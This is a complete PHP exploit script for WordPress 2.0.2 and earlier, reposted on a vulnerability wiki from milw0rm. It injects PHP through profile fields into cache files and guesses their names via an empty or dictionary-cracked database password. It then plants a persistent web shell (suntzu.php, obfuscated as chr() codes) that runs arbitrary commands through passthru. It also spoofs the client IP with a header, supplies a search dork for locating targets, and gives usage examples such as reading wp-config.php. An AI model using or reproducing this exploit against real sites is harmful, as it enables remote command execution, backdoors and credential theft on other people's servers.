PWNWIK.COM
,
EXP
#!/usr/bin/php -q -d short_open_tag=on <? echo "--------------------------------------------------------------------\r\n"; echo "| WordPress <= 2.0.2 'cache' shell injection exploit |\r\n"; echo "| by rgod email protected |\r\n"; echo "| site: http://retrogod.altervista.org |\r\n"; echo "| dork: inurl:wp-login.php Register Username Password -echo |\r\n"; echo "--------------------------------------------------------------------\r\n"; /* this works: regardless of all php.ini settings, if user registration is enabled, against an empty or weak MySQL DB password (read explaination for details...) */ if ($argc<6) { echo "Usage: php ".$argv0." host path user pass cmd OPTIONS \r\n"; echo "host: target server (ip/hostname) \r\n"; echo "path: path to WordPress \r\n"; echo "cmd: a shell command \r\n"; echo "user/pass: you need a valid user account \r\n"; echo "Options: \r\n"; echo " -Ddicrionary specify a textfile and try dictionary attack \r\n"; echo " -pport: \" a port other than 80 \r\n"; echo " -Pip:port: \" a proxy \r\n"; echo "Examples: \r\n"; echo "php ".$argv0." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n"; echo "php ".$argv0." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n"; echo "php ".$argv0." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; die; } /* explaination: i) wordpress stores some user informations inside cached files in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are php files. Normally they look like this: <?php //O:8:"stdClass":23:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:18:"email protected";s:8:"user_url";s:0:"";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:6:"suntzu";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:8:"nickname";s:6:"suntzu";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";} ?> but...what happens if you inject a carriage return ( chr(13)...), some php code and some escape chars when you update your profile (ex. in "displayname" argument)? Look at this file now: <?php //O:8:"stdClass":24:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:17:"email protected";s:8:"user_url";s:7:"http://";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:185:"suntzu error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUESTcmd=stripslashes($_REQUESTcmd);}echo 56789;passthru($_REQUESTcmd);echo 56789;//suntzuuuuuuuuuuuuuu";s:10:"first_name";s:6:"suntzu";s:9:"last_name";s:6:"suntzu";s:8:"nickname";s:6:"suntzu";s:11:"description";s:6:"whoami";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:12:"rich_editing";s:4:"true";s:14:"user_firstname";s:6:"suntzu";s:13:"user_lastname";s:6:"suntzu";s:16:"user_description";s:6:"whoami";} ?> you have a backdoor on target server... Now you have to search a way to guess filenames 'cause we have an index.php to trivially protect folders, but... guess what? give a look at wp-includes/cache.php at line 355: ... $cache_file = $group_dir.md5($id.DB_PASSWORD).'.php'; ... $group_dir is the folder where files are stored DB_PASSWORD costant could be empty, if so... you have only to calculate the md5 hash of your user id, then: http://target/path/wp-content/cache/users/md5(user_id).php?cmd=ls%20-la the same with userlogins/ folder, this time: http://target/path/wp-content/cache/userlogins/md5(username).php?cmd=ls%20-la otherwise you can check if DB_PASSWORD is in a dictionary through the -D option, this tool calculate the hash to do something like this: http://target/path/wp-content/cache/users/md5(user_iddb_pass).php?cmd=ls%20-la http://target/path/wp-content/cache/userloginss/md5(usernamedb_pass).php?cmd=ls%20-la ii) an ip-spoofing issue in vars.php: ... // On OS X Server, $_SERVER'REMOTE_ADDR' is the server's address. Workaround this // by using $_SERVER'HTTP_PC_REMOTE_ADDR', which *is* the remote address. if ( isset($_SERVER'HTTP_PC_REMOTE_ADDR') ) $_SERVER'REMOTE_ADDR' = $_SERVER'HTTP_PC_REMOTE_ADDR'; ... poc: you can set an http header like this when you register: PC_REMOTE_ADDR: 1.1.1.1 */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string$i) <= 32 ) | (ord($string$i) > 126 )) {$result.=" .";} else {$result.=" ".$string$i;} if (strlen(dechex(ord($string$i)))==2) {$exa.=" ".dechex(ord($string$i));} else {$exa.=" 0".dechex(ord($string$i));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts0.":".$parts1." proxy...\r\n"; $ock=fsockopen($parts0,$parts1); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv1; $path=$argv2; $username=$argv3; $password=$argv4; $cmd=""; $port=80; $proxy=""; $dict=""; for ($i=5; $i<=$argc-1; $i++){ $t=$argv$i0.$argv$i1; if (($t<>"-p") and ($t<>"-P") and ($t<>"-D")) {$cmd.=" ".$argv$i;} if ($t=="-p") { $port=str_replace("-p","",$argv$i); } if ($t=="-P") { $proxy=str_replace("-P","",$argv$i); } if ($t=="-D") { $dict=str_replace("-D","",$argv$i); } } $cmd=urlencode($cmd); if (($path0<>'/') or ($pathstrlen($path)-1<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "step 0 -> check if suntzu.php is already installed...\r\n"; $check=array("users/suntzu.php", "userlogins/suntzu.php" ); for ($i=0; $i<=count($check)-1; $i++) { $packet="GET ".$p."wp-content/cache/".$check$i." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"*DL*")) { echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo $temp1."\r\n";echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check$i."?cmd=ls%20-la";die; } } echo "step 1 -> Login ...\r\n"; $data="log=".urlencode(trim($username)); $data.="&pwd=".urlencode(trim($password)); $data.="&rememberme=forever"; $data.="&submit=".urlencode("Login »"); $data.="&redirect_to=wp-admin"; $packet="POST ".$p."wp-login.php HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; //ip spoofing bug in vars.php ;)... $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(" ",$temp1); $cookie=$temp20; $temp2=explode(" ",$temp2); $cookie.=" ".$temp20; if ($cookie==''){echo "Unable to login...";die;} else {echo "cookie ->".$cookie."\r\n";} echo "step 2 -> Retrieve your user id...\r\n"; $packet="GET ".$p."wp-admin/profile.php HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("checkuser_id\" value=\"",$html); $temp2=explode("\"",$temp1); $user_id=$temp20; if ($user_id==''){die("Unable to retrieve user id...\r\n");} else {echo "user id -> ".$user_id."\r\n";} echo "step 3 -> Update your profile with the evil code...\r\n"; $suntzu='$fp=fopen("suntzu.php","w");fputs($fp,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(114).chr(114).chr(111).chr(114).chr(95).chr(114).chr(101).chr(112).chr(111).chr(114).chr(116).chr(105).chr(110).chr(103).chr(40).chr(48).chr(41).chr(59).chr(115).chr(101).chr(116).chr(95).chr(116).chr(105).chr(109).chr(101).chr(95).chr(108).chr(105).chr(109).chr(105).chr(116).chr(40).chr(48).chr(41).chr(59).chr(105).chr(102).chr(32).chr(40).chr(103).chr(101).chr(116).chr(95).chr(109).chr(97).chr(103).chr(105).chr(99).chr(95).chr(113).chr(117).chr(111).chr(116).chr(101).chr(115).chr(95).chr(103).chr(112).chr(99).chr(40).chr(41).chr(41).chr(123).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(61).chr(115).chr(116).chr(114).chr(105).chr(112).chr(115).chr(108).chr(97).chr(115).chr(104).chr(101).chr(115).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(125).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(42).chr(68).chr(76).chr(42).chr(34).chr(59).chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62));fclose($fp);//'; $suntzu=urlencode($suntzu); $code='error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUESTcmd=stripslashes($_REQUESTcmd);}echo chr(42).chr(68).chr(76).chr(42);passthru($_REQUESTcmd);echo chr(42).chr(68).chr(76).chr(42);'; $code=urlencode($code); $data="from=profile"; $data.="&checkuser_id=".$user_id; $data.="&user_login=".urlencode(trim($username)); $data.="&first_name=".urlencode(trim($username)); $data.="&last_name=".urlencode(trim($username)).chr(13).$suntzu."//suntzuuu"; $data.="&nickname=".urlencode(trim($username)); $data.="&display_name=".urlencode(trim($username)).chr(13).$code."//suntzuu"; $data.="&email=".urlencode("email protected"); $data.="&url=".urlencode("http://"); $data.="&aim="; $data.="&yim="; $data.="&jabber="; $data.="&description=whoami"; $data.="&rich_editing=true"; $data.="&submit=".urlencode("Update Profile »"); $packet="POST ".$p."wp-admin/profile-update.php HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Referer: http://".$host.$path."wp-admin/profile-update.php\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (eregi("updated=true",$html)){echo "Done...\r\n";} else {die("Unable to update profile...");} echo "step 4 -> go to profile page to avoid cached files deletion...\r\n"; $packet="GET ".$p."wp-admin/profile.php?updated=true HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (eregi("200 OK",$html)){echo "Done...\r\n";} sleep(2); echo "step 5 -> check for an empty db password...\r\n"; $check=array("users/".md5($user_id).".php", "userlogins/".md5(trim($username)).".php" ); for ($i=0; $i<=count($check)-1; $i++) { $packet="GET ".$p."wp-content/cache/".$check$i." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (eregi("*DL*",$html)) { echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo($temp1);echo"\r\nNow you can launch commands through the followig urls:\r\n http://".$host.$path."wp-content/cache/".$check$i."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die; } } if ($dict=='') {echo "exploit failed...\r\n";} else { echo "step 6 -> trying with dictionary attack...\r\n"; if (file_exists($dict)) { $fp=fopen($dict,"r"); while (!feof($fp)) { $word=trim(fgets($fp)); $check=array("users/".md5($user_id.$word).".php", "userlogins/".md5(trim($username).$word).".php" ); for ($i=0; $i<=count($check)-1; $i++) { echo "Trying with ".$check$i."\r\n"; $packet="GET ".$p."wp-content/cache/".$check$i." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"*DL*")) { echo "Exploit succeeded...\r\n";fclose($fp);$temp=explode("*DL*",$html);echo $temp1;echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check$i."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n"; die; } } } fclose($fp); //if you are here... echo "Exploit failed...\r\n"; } else { die($dict."does not exist!"); } } ?> # milw0rm.com 2006-05-25
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
